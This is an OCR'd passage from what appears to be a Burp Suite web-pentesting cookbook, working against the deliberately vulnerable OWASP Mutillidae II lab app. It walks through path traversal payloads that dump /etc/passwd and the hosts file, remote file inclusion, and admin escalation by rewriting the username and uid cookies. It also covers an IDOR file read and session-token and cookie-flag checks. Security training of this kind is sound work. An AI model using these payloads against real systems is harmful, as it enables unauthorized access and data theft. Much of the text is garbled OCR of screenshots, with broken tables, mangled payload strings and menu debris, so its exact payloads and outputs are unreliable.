Attack Save Columns 


Ad de detcthosts %00 


../. boot.ini 

LAL EPA 

AAA detcipasswd%00 
A detcipasswd 
A detcishadow %00 
Ad detcishadow 200 


12. Select the Request #2 in the list. From the attack results table, look at 


the Response | Render tab and notice the page displays the host file from 
the system! 


Attack Save Columns 


_{ Resuts l Target | Positions | Payloads | Options 


Filter: Showing all tems | 


Request à| Payload | Status | Error | Timeout | Length | Comment 


0 200 ü ü 50739 
1 wld dL dd detcmosts%00 200 O O 42092 


JADA AAI Idd Jetciho 71408 


J. Jboot.ini 200 O 41900 


3 

4 AAA bbb A AWD 200 2] O 41972 

5 200 O © 42098 

6 200 2] 42274 

7 200 O O 42098 

8 200 O © 38922 
2N Jil. [al AATA 


[ Request | Response 
Raw | Headers | Hex | HTML Render | 


@ OWASP Mutillidae II: Web Pwn in Mass Production 


Hints: Enabled (1 - Script Kiddie) 


Version: 2.6.24 Security Level: 0 (Hosed) Not Logged In 


127.0,0, 1 localhost 127.0. 1.1 owaspbwa owaspbwa.localdomain # following lines are for the hackxor 
application 127.0.0.1 wraithmail 127,0,0, 1 cloaknet 127.0.0.1 gghb 127.0.0.1 hub71 127.0.0.1 utrack 
OWASP 2010 127,0.0,1 wraithbox # the following are used for OWASP 1 Liner 127.0.0.1 local. 1-iner.org 127.0.0.1 

other. 1-liner.org 127.0.0.1 local.l-iner.org 127.0.0.1 3rd-party.info 127.0.0.1 attackr.se # The following lines 
OWASP 2007 are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00: :0 
ip6-mcastprefix ff02:: 1 ip6-allnodes ff02: :2 ip6-allrouters ff02::3 ipé-allhosts 


OWASP 2013 


Web Services 


13. Continue scrolling down the list of requests in the attack results table. Look 
at request #6, and then look at the Response | Render tab and notice the 
page displays the /etc/passwd file from the system! 


Attack Save Columns 


_[ Resuts | Target | Positions | Payloads | Options 


Filter: Showing all items L 
} | Status | Error | Timeout | Length | Comment 
200 z] O 50739 
ms 1 
200 ü 
200 O 
200 O 
a 


oop 
oop 


8 AAA AAA Add dd detcishadow 200 
o AAPA Ped tt lateinacewd^s 20N. 


@ OWASP Mutillidae II: Web Pwn in Mass Production 


Version: 2.6.24 Security Level: O (Hosed) Hints: Enabled (1 - Script Kiddie) Not Logged In 
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OWASP 2013 root:x:0:0:root:/root:/bin/bash daemon:x: 1: 1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bi 
syne:x:4:65534:sync:/bin:/bin/sync games:x:5:60:qames:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh 
OWASP 2010 Ip:x:7:7:Ip:/var/spool/pd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh 


uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy :x:13:13:proxy :/bin:/bin/sh www-data:x:33:33:www-data:/var/www: 
OWASP 2007 backup :x:34:34:backup:/var/backups:/bin/sh list:x:38:38 Mailing List Manager :/var /list: /bin/sh 
irc:x:39:39:ired:/var/run/ircd:/bin/sh gnats :x:41:41:Gnats Bug-Reporting System (admin): /var /lib/gnats:/bin/sh 
Web Services nobody :x:65534:65534 :nobody :/nonexistent: /bin/sh libuuid:x: 100; 10 1: :/var /lib/libuuid: /bin/sh 
syslog:x: 101: 102: :/nome/syslog; /bin/false klog:x: 102: 103: :/home/klog:/bin/false mysq|:x:103:105:MySQL 
HTML 5 Server,,,:/var/ib/mysq|:/bin/false landscape :x: 104: 122::/var /ib/landscape: /bin/false 


How it works... 


Due to poorly protected file permissions and lack of application authorization 
checks, attackers are able to read privileged local files on a system containing 
sensitive information. 


Testing for Remote File Inclusion 
(RFI) 


Remote File Inclusion (RFT) is an attack attempting to access external URLs 
and remotely located files. The attack is possible due to parameter manipulation 
and lack of server-side checks. These oversights allow parameter changes to 
redirect the user to locations that are not whitelisted or sanitized with proper data 
validation. 


Getting ready 


Using OWASP Mutillidae IT as our target application, let's determine whether it 
contains any RFI vulnerabilities. 


How to do it... 


Ensure Burp and OWASP BWA VM are running and that Burp is configured in 
the Firefox browser used to view the OWASP BWA applications. 


1. From the OWASP BWA Landing page, click the link to the OWASP 
Mutillidae II application. 

2. Open the Firefox browser to the login screen of OWASP Mutillidae II. 
From the top menu, click Login. 

3. Find the request you just performed within the Proxy | HTTP history table. 
Look for the call to the login. php page: 


Target Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 


| Intercept || HTTP history] WebSockets history | Options 


Filter: Hiding CSS, image and general binary content 


|# 4) Host | Method URL | Params | Edited Status Length MIME type Extension 


| 378 http:// 


Request | Response 
_{ Raw Params | Headers | Hex 


GET /mutillidae/index.php?page=login.php HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/S.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 

Accept: text/html,application/xhtml+xml, application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/mutillidae/index.php?page=home. phpépopUpNot i ficat ionCode=HPHO 

Cookie: showhints=1; PHPSESSID=c7é6étk7iSodqSg4lumc2ccoék2; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada 
Connection: close 

Upgrade-Insecure-Requests: 1 


4. Make a note of the page parameter that determines the page to load: 


| Request | Response | 


Raw | Params | Headers | Hex 


GET /mutillidae/index.php?page=Login.php HTTP/1.1 


Let's see if we can exploit this parameter by providing a URL that is 
outside the application. For demonstration purposes, we will use a URL 
that we control in the OWASP BWA VM. However, in the wild, this URL 
would be attacker-controlled instead. 


5. Switch to the Proxy | Intercept tab, and press the Intercept is on button. 
6. Return to the Firefox browser, and reload the login page. The request is 
paused and contained within the Proxy | Intercept tab: 


Forward Drop Action 


Raw Params Headers Hex 


7. Now let's manipulate the value of the page parameter from login.php to a 
URL that is external to the application. Let's use the login page to the 
GetBoo application. Your URL will be specific to your machine's IP 
address, so adjust accordingly. The new URL will be 
http://<your_IP_address>/getboo/ 

8. Replace the login. php value with http: //<your_IP_address>/getboo/ 
and click the Forward button: 


Target | Proxy. l Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 
intercept. | HTTP history | WebSockets history | Options 
LF) Request to http://192.168.56.101:80 
Forward Drop | Intercept is on | Action 
Raw | Params | Headers | Hex 


GET /mutillidae/index-.php?page=http: //192.168.56.101/gethoo/]| HTTP/1.1 
Host: o U 


User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/6l.0 

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/mutillidae/index.php?page=home.phpépopUpNoti ficationCode=HPHO 

Cookie: showhints=1; PHPSESSID=c766étk7iSodqSg4lumelecoék2; acopendivids=swingset ,jotto,phpbb2,redmine; acgroupswithpersist=nada 
Connection: close 

Upgrade-Insecure-Requests: 1 

Cache-Control: max-age=0 


9. Now press the Intercept is on again to toggle the intercept button to OFF 


(Intercept is off). 
10. Return to the Firefox browser, and notice the page loaded is the GetBoo 


index page within the context of the Mutillidae application! 
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Project Whitepaper 
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Release 
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Please remove the /install folder now 
GetBoo Logo 
About / Help / Register / Log In 


Welcome to getboo! 


The social bookmarking open-source platform. 
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Toggle Security Enforce SSL ResetDB ViewLog View Captured Data 


Not Logged In 
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How it works... 


The page parameter does not include proper data validation to ensure the values 
provided to it are whitelisted or contained to a prescribed list of acceptable 
values. By exploiting this weakness, we are able to dictate values to this 
parameter, which should not be allowed. 


Testing for privilege escalation 


Developer code in an application must include authorization checks on assigned 
roles to ensure an authorized user is not able to elevate their role to a higher 
privilege. Such privilege escalation attacks occur by modifying the value of the 
assigned role and replacing the value with another. In the event that the attack is 
successful, the user gains unauthorized access to resources or functionality 
normally restricted to administrators or more-powerful accounts. 


Getting ready 


Using OWASP Mutillidae II as our target application, let's log in as a regular 
user, John, and determine whether we can escalate our role to admin. 


How to do it... 


Ensure Burp and OWASP BWA VM are running and that Burp is configured in 
the Firefox browser used to view the OWASP BWA applications. 


1. From the OWASP BWA Landing page, click the link to the OWASP 


Mutillidae II application. 
2. Open the Firefox browser to the login screen of OWASP Mutillidae II. 


From the top menu, click Login. 
3. At the login screen, log in with these credentials—username: john 


and password: monkey. 


4. Switch to Burp's Proxy | HTTP history tab. Find the PosT and subsequent 
GET requests you just made by logging in as john: 


Target | Proxy | Spider | Scanner | intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 


(merce oo | weesoces rmon omons ] 


Filter. Hiding CSS, image and general binary content 


# Aj|Host Method | URL | Params | Edited | Status {Length | MIMEtype | Extension | Title 


5. Look at the GET request from the listing; notice the cookie name/value pairs 
shown on the Cookie: line. 


The name/value pairs of most interest include username=john and uid=3. 
What if we attempt to manipulate these values to a different role? 


Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 
| Í intercept [ HTTPhistory | webSockets history | Options 


Filter: Hiding CSS, image and general binary content 


[# a| Host | Method | URL | Params | Edited | Status |Length |MIMEtype | Extension 
v 302 50912 HTML php 
y 200 6550 HTML _php 


426 http://192.168.56.101 POST /mutillidae/index.php?page=login.php 


| | Request | Response 
Í Raw | Params | Headers | Hex 


GET /mutillidae/index.php?popUpNotificationCode=AUL HTTP/1.1 


Host: 192.168.56.101 
User-Agent: Mozilla/S.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 


Accept: text/html,application/xhtmlt+xml, application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: až a a y ET 


acopendivids= ; acgroupswithpersist= 


ookie: showhints= username: 
onnection: close 
Upgrade-Insecure-Requests: 1 


6. Let's attempt to manipulate the parameters username and the uid stored in 
the cookie to a different role. We will use Burp's Proxy | Intercept to help 
us perform this attack. 

7. Switch to the Proxy | Intercept tab, and press the Intercept is on button. 
Return to the Firefox browser and reload the login page. 


8. The request is paused within the Proxy | Intercept tab. While it is paused, 
change the value assigned to the username from john to admin. Also, 
change the value assigned to the uid from 3 to 1: 


Target Spider | Scanner | Intruder | Repeater | Sequencer 


| [intercon | HTTP nistor | HTTP history | WebSockets history | Options | 


| | | Request to http://192.168.56.101:80 


| Forward | Drop | | Action 


Raw | Params | Headers | Hex 


GET /mutillidae/index.php?popUpNotificationCode=AU1l HTTP/1 
Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rvi. 
Accept: text/html,application/xhtultxml, application/xml;q=!| 
Accept-Lanquage: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/mutillidae/index.php?page=l1) 
Cookie: showhints=1; username=admin; uid=1, PHPSESSID=c7éé1 


Connection: close 
Upgqrade-Insecure-Requests: 1 
Cache-Control: max-age=0 


9. Click the Forward button, and press the Intercept is on again to toggle the 
intercept button to OFF (Intercept is off). 

10. Return to the Firefox browser, and notice we are now logged in as an 
admin! We were able to escalate our privileges from a regular user to an 
admin, since the developer did not perform any authorization checks on the 
assigned role: 


Version: 2.6.24 


Home Logout 


» 
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Security Level: 0 (Hosed) 


Hints: Enabled (1 - 5cr1pt K1dd1e) 


Logged In Admin: admin (g0t r00t? 


Toggle Hints Show Popup Hints Toggle Security Enforce SSL ResetDB ViewLog View Captured Data 
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How it works... 


There are several application issues associated with the privilege escalation 
attack shown in this recipe. Any actions related to account provisioning (that is, 
role assignments) should only be allowed by administrators. Without proper 
checks in place, users can attempt to escalate their provisioned roles. Another 
issue exemplified in this recipe is the sequential user ID number (for example, 
uid=3). Since this number is easily guessable and because most applications start 
with administrator accounts, changing the digit from 3 to 1 seemed a probable 
guess for association with the admin account. 


Testing for Insecure Direct Object 
Reference (IDOR) 


Allowing unauthorized direct access to files or resources on a system based on 
user-supplied input is known as Insecure Direct Object Reference (IDOR). 
This vulnerability allows the bypassing of authorization checks placed on such 
files or resources. IDOR is a result of unchecked user supplied input to retrieve 
an object without performing authorization checks in the application code. 


Getting ready 


Using OWASP Mutillidae IT as our target application, let's manipulate the value 
of the phpfile parameter to determine whether we can make a call to a direct 
object reference on the system, such as /etc/passwd file. 


How to do it... 


1. From the Mutillidae menu, select OWASP 2013 | A4 — Insecure Direct 
Object References | Source Viewer: 


©% OWASP Mutillidae Il: Web Pwn in | 


Hints: Enabled (1 - 5cr1pt K1dd1e) 


Version: 2.6.24 Security Level: 0 (Hosed) 


Home Logout Toggle Hints Show Popup Hints Toggle Security Enforce SSL Res 


OWASP 2013 A1 - Injection (SQL) A Å 
EES rately Vulnerable Web 

OWASP 2010 
A2 - Broken Authentication and 


} 
OWASP 2007 Session Management Like Mutillidae? Check out how to 


Web Services A3 - Cross Site Scripting (XSS) > 


A4 - Insecure Direct Object > Text File Viewer 
References 


HTML 5 
Source Viewer 


2. From the Source Viewer page, using the default file selected in the drop- 
down box (upload-file.php), click the View File button to see the 
contents of the file displayed below the button: 


© OWASP Mutillidae Il: Web Pwn in Mass Production 


Version: 2.6.24 Security Level: 0 (Hosed) Hints: Enabled (1 - 5criptKiddte) Not Logged In 


Home Login/Register Toggle Hints Show Popup Hints Toggle Security Enforce SSL ResetDB ViewLog View Captured Data 


Source Code Viewer 
Back g Help Me! 


y Hints 
Note that not all files are listed, 
Source File Name upload-fie,php 
File: upload-file,php 


<?php include once (_ROOT_.'/classes/FileUploadExceptionHandler.php') ;?> 
<?php include once (_ ROOT_.'/includes/back-button.inc') ;2> 
<?php include once (_ ROOT .'/includes/hints-level-1/level-1-hints-menu-wrapper.inc') ; ?> 
<?php 
try{ 
switch ($_SESSION["security-level"]){ 
case "0"; // This code is insecure. No input validation is performed. 


$lEnableJavaScriptValidation = FALSE; 


3. Switch to Burp's Proxy | HTTP history tab. Find the POST request you just 
made while viewing the upload-file.php file. Note the phpfile parameter 
with the value of the file to display. What would happen if we change the 
value of this parameter to something else? 


Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 
Intercept | HTTP history | WebSockets history | Options 


Filter: Hiding CSS, image and general binary content 


Method URL | Params | Edited | Status 
n z / 200° 


Request | Response 
[Paw | Params | Headers | Hex 


POST /mutillidae/index.php?page=source-viewer.php HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/S.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/mutillidae/index.php?page=source-viewer.php 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 93 

Cookie: showhints=1; PHPSESSID=c7é6étk7iSodqSg4lumclccoékl2; acopendivids=swingset,jotto,phpbbl,redmine; acgroupswithpersist=nada 


Length MIME type Extension Title 


Connection: close 
Upgrade-Insecure-Requests: 1 


page=source-viewer. phpéphp file=tipload= file) phpésource-file-viewer-php-submit-button=ViewtFile 


4. Let's perform an IDOR attack by manipulating the value provided to the 
phpfile parameter to reference a file on the system instead. For example, 
let's try changing the upload-file.php value to ../../../../etc/passwd 
via Burp's Proxy | Intercept functionality. 

5. To perform this attack, follow these steps. 

1. Switch to the Proxy |Intercept tab, and press the Intercept is on 
button. 

2. Return to the Firefox browser and reload the login page. The request is 
paused and contained within the Proxy | Intercept tab. 


3. As the request is paused, change the value assigned to the phpfile 
parameter to the value ../../../../etc/passwd instead: 


Target | Proxy | Spider | Scanner Comparer | Extender | Project options 


intercept | HTTP history | WebSockets history | Options 


(2) Request to http:4/192.168.56.101:30 
Forward Drop Intercept is on Action 
Raw | Params | Headers | Hex 


POST /mutillidae/index.php?page=source-viewer.php HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Geelro/20100101 Firefox/él.0 
Accept: text/html,application/xhtmltxml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/mutillidae/index.php?page=source-viewer.php 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 93 

Cookie: showhints=l1; PHPSESSID=c7é6tk7iSodqSq4lumelecoék2; acopendivids=swingset,jotto,phpbbh2,redmine; 
Connection: close 

Upgrade-Insecure-Requests: 1 


page=source-viewer.phpd Iksource-file-viewer-php-submit-button=ViewtFile 


6. Click the Forward button. Now press the Intercept is on button again to 
toggle the intercept button to OFF (Intercept is off). 


7. Return to the Firefox browser. Notice we can now see the contents of the 
/etc/passwd file! 


Source Code Viewer 
Back 2 Help Me! 


vy Hints | 


To see the source of the file, choose and click "View File”. 


Note that not all files are listed. 


Source File Name upload-file.php v 


File: ../../../../etc/passwd 


root:x:0:0:root:/root:/bin/bash 

daemon :x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys:/dev:/bin/sh 
sync:x:4:65534:sync:/bin: /bin/sync 

games :x:5:60:games:/usr/games:/bin/sh 
man:x:6:12:man:/var/cache/man: /bin/sh 
lp:x:7:7:lp:/var/spool/lpd:/bin/sh 
mail:x:8:8:mail:/var/mail:/bin/sh 

news :x:9:9:news:/var/spool/news:/bin/sh 
uucp:x:10:10:uucp:/var/spool/uucp: /bin/sh 

proxy :x:13:13:proxy:/bin:/bin/sh 
www-data:x:33:33:www-data: /var/www: /bin/sh 

backup :x:34:34:backup: /var/backups:/bin/sh 
list:x:38:38:Mailing List Manager:/var/list:/bin/sh 
irc:x:39:39:ircd:/var/run/ircd:/bin/sh 
aqnats:x:41:41:Gnats Buq-Reporting System (admin) :/var/lib/qnats:/bin/sh 


How it works... 


Due to lack of proper authorization checks on the phpfile parameter within the 
application code, we are able to view a privileged file on the system. Developers 
and system administrators provide access controls and checks prior to the 
revealing of sensitive files and resources. When these access controls are 
missing, IDOR vulnerabilities may be present. 


Assessing Session Management 
Mechanisms 


In this chapter, we will cover the following recipes: 


Testing session token strength using Sequencer 
Testing for cookie attributes 

Testing for session fixation 

Testing for exposed session variables 

Testing for Cross-Site Request Forgery 


Introduction 


This chapter covers techniques used to bypass and assess session management 
schemes. Session management schemes are used by applications to keep track of 
user activity, usually by means of session tokens. Web assessments of session 
management also involve determining the strength of session tokens used and 
whether those tokens are properly protected. We will learn how to use Burp to 
perform such tests. 


Software tool requirements 


To complete the recipes in this chapter, you will need the following: 


OWASP Broken Web Applications (VM) 

OWASP Mutillidae link 

Burp Proxy Community or Professional (https://portswigger.net/burp/) 
A Firefox browser configured to allow Burp to proxy traffic 


(https://www.mozilla.org/en-US/firefox/new/) 


Testing session token strength using 
Sequencer 


To track user activity from page to page within an application, developers create 
and assign unique session token values to each user. Most session token 
mechanisms include session IDs, hidden form fields, or cookies. Cookies are 
placed within the user's browser on the client-side. 


These session tokens should be examined by a penetration tester to ensure their 
uniqueness, randomness, and cryptographic strength, to prevent information 
leakage. 


If a session token value is easily guessable or remains unchanged after login, an 
attacker could apply (or fixate) a pre-known token value to a user. This is known 
as a session fixation attack. Generally speaking, the purpose of the attack is to 
harvest sensitive data in the user's account, since the session token is known to 
the attacker. 


Getting ready 


We'll check the session tokens used in OWASP Mutillidae II to ensure they are 
created in a secure and an unpredictable way. An attacker who is able to predict 
and forge a weak session token can perform session fixation attacks. 


How to do it... 


Ensure Burp and the OWASP BWA VM are running and that Burp is configured 
in the Firefox browser used to view OWASP BWA applications. 


1. From the OWASP BWA Landing page, click the link to the OWASP 
Mutillidae II application. 

2. Open the Firefox browser to access the home page of OWASP Mutillidae II 
(URL: http://<your_VM_assigned_IP_address>/mutillidae/). Make 
sure you are starting a fresh session of the Mutillidae application and not 
logged into it already: 


@% OWASP Mutillidae Il: Web Pwn in Mass Production 
Version: 2.6.24 Security Level: 0 (Hosed) Hints: Enabled (1-5criptKidd1e) [ NotLoggedin | == 


Home Login/Register Toggle Hints Show Popup Hints Toggle Security Enforce SSL Reset DB View Log View Captured Data 


OWASP 2013 » 


3. Switch to the Proxy | HTTP History tab and select the request showing your 
initial browse to the Mutillidae home page. 

4. Look for the GET request and the associated response containing the Set - 
Cookie: assignments. Whenever you see this assignment, you can ensure 
you are getting a freshly created cookie for your session. Specifically, we 
are interested in the PHPSESSID cookie value: 


Logging of out-of-scope Proxy traffic is disabled | Re-enable 


Fitter: Hiding CSS, image and general binary content 


Host Method | URL Params | Edited | Status | Length | MIME type 


=n | 


HTTP/1.1 200 OK 


Date: Tue, 04 Sep 2018 18:41:58 GMT 
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-lubuntu4. 30 with Suhosin-Patch proxy html/3.0.1 mod_pyth 
Phusion Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1 


Set-Cookie: showhints=1 
Logged-In-User: 

Vary: Accept-Encoding 
Content-Length: 45632 
Connection: close 
Content-Type: text/html 


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" “http: //www.w3.org/TR/1999/REC-html 401-19991224/1 
shtml> 
<head> 

<link rel="shortcut icon" href="./images/favicon.ico" type="image/x-icon" /> 

<link rel="stylesheet" type="text/css" href=". /styles/global-styles.css" /> 

<link rel="stylesheet" type="text/css" href=". /styles/ddsmoothmenu/ddsmoothmenu.css" /> 

slink rel="stylesheet" type="text/css" href=". /styles/ddsmoothmenu/ddsmoothmenu-v. css" /> 


5. Highlight the value of the of the PHPSESSID cookie, right-click, and 
select Send to Sequencer: 


Í Request | Response | 
(pau [entes |e [| 


HTTP/1.1 200 OK 

Date: Tue, 04 Sep 2018 18:41:58 GMT 

server: Apache/2.2.14 (Ubuntu) mod _mono/2.4.3 PHP/5.3.2-lubuntud. 30 with 
Phusion Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1 

X-Powered-By: PHP/5.3.2-lubuntud. 30 

Set-Cookie: PHPSESSID= 
Set-Cookie: showhints=1 
Logged-In-User: 

Vary: Accept-Encoding 
Content-Length: 45632 Do a passive scan 
Connection: close Sand to Intruder 


Content-Type: text/html 
Send to Repeater 


Send to Spider 


Do an active scan 


Send to Sequencer 


Sequencer is a tool within Burp designed to determine the strength or the 
quality of the randomness created within a session token. 


6. After sending the value of the PHPSESSID parameter over to Sequencer, you 
will see the value loaded in the Select Live Capture Request table. 

7. Before pressing the Start live capture button, scroll down to the Token 
Location Within Response section. In the Cookie dropdown list, select 
PHPSESSID=<captured session token value>: 


(?) Select Live Capture Request 


Send requests here from other tools to configure a live capture. Select the request to use, configure the other options 


B Token Location Within Response 


Select the location in the response where the token appears. 


© Cookie: showhints= 
l showhints=1 
Form field: | 
O Custom location: | | Configure 


8. Since we have the correct cookie value selected, we can begin the live 
capture process. Click the Start live capture button, and Burp will send 
multiple requests, extracting the PHPSESSID cookie out of each response. 


After each capture, Sequencer performs a statistical analysis of the level of 
randomness in each token. 


9. Allow the capture to gather and analyze at least 200 tokens, but feel free to 
let it run longer if you like: 


Eeu Sequencer [live capture #1: http://192.168.56.10 
(?) Live capture (596 tokens) Ww 


Pause Copy tokens J Auto analyze (next: 600) Requests: 596 


Stop Save tokens | Analyze now | Errors: 0 


Summary Character-level analysis Bit-levelanalysis Analysis Options 


10. Once you have at least 200 samples, click the Analyze now button. 
Whenever you are ready to stop the capturing process, press the Stop button 
and confirm Yes: 


BW surg sequencer [live capture #1: http://192.168.56.101) 


yang 
~OnNTIFM 


@ Live capture (5855 tokens) d j 
Pause Copy tokens g Au A Are you sure you want to stop? 
Save tokens | R! 
"M Ee (ws 


| Summary | Character-level analysis | Bit-level analysis | Analysis Options | 


11. After the analysis is complete, the output of Sequencer provides an overall 
result. In this case, the quality of randomness for the PHPSESSID session 
token is excellent. The amount of effective entropy is estimated to be 112 


bits. From a web pentester perspective, these session tokens are very strong, 
so there is no vulnerability to report here. However, though there is no 
vulnerability present, it is good practice to perform such checks on session 
tokens: 


ice (no) Á 
Pause Copy tokens Auto analyze Requests: 20004 


Stop Save tokens Analyzenow | Errors: 0 
ary | Character-evel analysis | Bi-level analysis | Analysis Options 


Overall result 


The overall qualty of randomness within the sample is estimated to be: excellent, 
Ata significance level of 1%, the amount of effective entropy is estimated to be: 112 bis, 


Note: Character-level analysis was not performed because the sample size is foo small relative to the size of the character set used in the sampled tokens 


Effective Entropy 


The chart shows the number of bits of effective entropy at each significance level, based on al tests. Each significance level defines a minimum probabilty of the obs 
the sample is randomly generated. When the probabilty of the observed results occurring falls below this level, the hypothesis that the sample is randomly generated 
significance level means that stronger evidence is required to reject the hypothesis that the sample is random, and 3o increases the chance that non-random data wil 


10% 


How it works... 


To better understand the math and hypothesis behind Sequencer, consult 
Portswigger's documentation on the topic here: 


https://portswigger.net/burp/documentation/desktop/tools/sequencer/tests. 


Testing for cookie attributes 


Important user-specific information, such as session tokens, is often stored in 
cookies within the client browser. Due to their importance, cookies need to be 
protected from malicious attacks. This protection usually comes in the form of 
two flags—secure and HttpOnly. 


The secure flag informs the browser to only send the cookie to the web server if 
the protocol is encrypted (for example, HTTPS, TLS). This flag protects the 
cookie from eavesdropping over unencrypted channels. 


The HttpOnly flag instructs the browser to not allow access or manipulation of 
the cookie via JavaScript. This flag protects the cookie from cross-site scripting 
attacks. 


Getting ready 


Check the cookies used in the OWASP Mutillidae II application, to ensure the 
presence of protective flags. Since the Mutillidae application runs over an 
unencrypted channel (for example, HTTP), we can only check for the presence 
of the HttpOnly flag. Therefore, the secure flag is out of scope for this recipe. 


How to do it... 


Ensure Burp and OWASP BWA VM are running and that Burp is configured in 
the Firefox browser used to view OWASP BWA applications. 


1. From the OWASP BWA Landing page, click the link to the OWASP 
Mutillidae II application. 

2. Open the Firefox Browser, to access the home page of OWASP Mutillidae 
II (URL: http://<your_VM_assigned_IP_address>/mutillidae/). Make 
sure you are starting a fresh session and you are not logged in to the 
Mutillidae application: 


mY no! 


Mutillidae; Deliberately Vulnerable Web Pen-Testing Application 


r) Like Mutillidae? Check out how to help 


i What Should | Do? D Video Tutorials 


9 Help Me! $ Listing of vulnerabilities 


) Bug Tracker A Bug Report Email Address 


3. Switch to the Proxy | HTTP history tab, and select the request showing your 
initial browse to the Mutillidae home page. Look for the GET request and its 
associated response containing Set-Cookie: assignments. Whenever you 
see this assignment, you can ensure you are getting a freshly created cookie 
for your session. Specifically, we are interested in the PHPSESSID cookie 
value. 

4. Examine the end of the Set-Cookie: assignments lines. Notice the absence 
of the HttpOnly flag for both lines. This means the PHPSESSID and 


showhints cookie values are not protected from JavaScript manipulation. 
This is a security finding that you would include in your report: 


= 


Logging of out-of-scope Proxy traffic is disabled | Re-enable 


Fiter: Hiding CSS, image and general binary content 


# Atos (Metod | URL Paans Edited (Stats Lengh | ME gE 


HITP/1.1 200 0K 

Date: Tue, 04 Sep 2018 18:41:58 GMT 

server: Apache/?.2.14 (Ubuntu) mod _mono/?.4.3 PHP/S.3.2-Lubuntud. 30 with Suhosin-Patch proxy html/3.0.1 mod pyth 
Phusion Passenger /4.0.38 mod_perl/2.0.4 Perl/v$.10.1 

X-Powered-By: PHP/$.3.2-Lubuntud. 30 


i) 


show 
Logged-In-User: 
Vary: Accept-Encoding 
Content-Length: 45632 
Connection: close 


Content-Type: text/html 


How it works... 


If the two cookies had HttpOnly flags set, the flags would appear at the end of 
the Set-Cookie assignment lines. When present, the flag would immediately 
follow a semicolon ending the path scope of the cookie, followed by the string 
HttpOnly. The display is similar for the Secure flag as well: 


Set-Cookie: PHPSESSID=<session token value>; path=/;Secure;HttpOnly; 


Testing for session fixation 


Session tokens are assigned to users for tracking purposes. This means that when 
browsing an application as unauthenticated, a user is assigned a unique session 
ID, which is usually stored in a cookie. Application developers should always 
create a new session token after the user logs into the website. If this session 
token does not change, the application could be susceptible to a session fixation 
attack. It is the responsibility of web penetration testers to determine whether 
this token changes values from an unauthenticated state to an authenticated state. 


Session fixation is present when application developers do not invalidate the 
unauthenticated session token, allowing the user to use the same one after 
authentication. This scenario allows an attacker with a stolen session token to 
masquerade as the user. 


Getting ready 


Using the OWASP Mutillidae II application and Burp's Proxy HTTP History and 
Comparer, we will examine unauthenticated PHPSESSID session token value. 
Then, we will log in to the application and compare the unauthenticated value 
against the authenticated value to determine the presence of the session fixation 
vulnerability. 


How to do it... 


1. Navigate to the login screen (click Login/Register from the top menu), but 
do not log in yet. 

2. Switch to Burp's Proxy HTTP history tab, and look for the GET request 
showing when you browsed to the login screen. Make a note of the value 
assigned to the PHPSESSID parameter placed within a cookie: 


Project options | User options | Alerts 


Filter: Hiding CSS, image and general binary content 


# | Host | Method | URL | Params | Edited | Status | Length | MIME type | Title 
prr ee sey o TE eg aggre FS 7 200 50832 7 


| Extension 
Lis php 


Request | Response | 
[Paw l Params | Headers | Hex 


GET /mutillidae/index.php?page=login.php HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 
Accept: text/html, application/xhtmltxml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http://192. 168 Ol/mutillidae/index p?page=a 
Cookie: showhints=1; | PHPSESSID=| | 
Connection: close 

Upgrade-Insecure-Requests: 1 

Cache-Control: max-age=0 


